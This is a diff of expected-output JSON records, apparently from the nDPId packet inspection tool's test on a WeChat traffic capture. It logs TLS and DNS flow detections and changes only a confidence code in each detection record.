00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1492167648243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1492167648243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7101AAEAR3q7AqAFnwKgB\/kphADUAJzTVMN0BAAABAAAAAAAAA3JlcwJ3eAJxcQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1492167648277,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1492167648277,"pkt":"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"} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} 
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} 
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} 
-01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} 
+01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} +01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} 